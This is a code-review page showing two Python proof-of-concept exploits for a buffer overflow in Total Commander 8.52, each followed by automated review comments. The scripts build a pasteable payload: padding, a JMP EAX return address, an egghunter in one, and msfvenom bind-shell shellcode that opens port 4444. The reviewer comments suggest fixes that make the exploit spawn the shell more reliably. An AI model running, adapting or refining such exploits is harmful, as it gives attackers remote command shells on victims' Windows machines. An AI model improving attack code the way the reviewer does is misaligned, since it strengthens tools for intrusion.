buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
"\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
"\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
"\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
"\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
"\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
"\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
"\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
"\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
"\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
"\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
"\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
"\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
"\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
"\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
"\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
"\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
"\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
"\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
"\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
"\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
"\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
"\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
"\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
buffer += "\x90" *10
file.write(buffer)
file.close()
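Review bot: The return address `\xfe\x24\x76\x6d` (0x6d7624fe, the `Jmp eax` in the comment) is hard-coded without naming the module it lives in; on Windows 10 every system DLL is ASLR-randomised, so this presumably points into a non-ASLR module shipped with Total Commander 8.52 x32, and the script should say so with a comment like `# 0x6d7624fe: JMP EAX in <module>, not ASLR/rebase protected — TODO name the module`, because the PoC will crash instead of spawning the shell if that module is updated or rebased. Minor: `file` shadows the builtin and the handle is not closed on an exception — `with open('time.txt', 'wb') as out: out.write(buffer)` does the same in one line. Port 4444 in step 7 is msfvenom's default for `windows/shell_bind_tcp`, which is consistent with the embedded payload.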


@ -0,0 +1,55 @@
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'w');
buffer = "\x90"*190
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX
buffer += "\x90"*(265- len(buffer))
buffer += "\x47\x47\xf7\x75" #75F74747 FFE0 JMP EAX
# bad characters - \x00\x0a\x0d
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11"
"\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69"
"\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4"
"\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30"
"\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3"
"\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94"
"\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b"
"\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4"
"\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5"
"\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1"
"\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16"
"\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51"
"\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3"
"\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06"
"\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49"
"\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65"
"\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf"
"\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb"
"\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba"
"\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08"
"\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b"
"\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c"
"\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")
file.write(buffer)
file.close()
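Review bot: This variant opens `time.txt` in text mode (`'w'`) while its sibling 38243.py uses `'wb'`; on Windows text mode rewrites `\n` as `\r\n`. Nothing is mangled today because 0x0a is already excluded as a bad character and the egghunter and `JMP EAX` bytes contain none, but any later edit that introduces 0x0a would be silently corrupted, so use `file = open('time.txt', 'wb')` for consistency. The egghunter uses `int 0x2e` with syscall number 0x02, the classic XP-era form, and `0x75F74747` is a fixed address consistent with the "Tested On: Windows XP SP2" header; both constraints belong in a comment next to the egghunter, since the hunter's syscall number and the non-ASLR address do not carry over to later Windows versions.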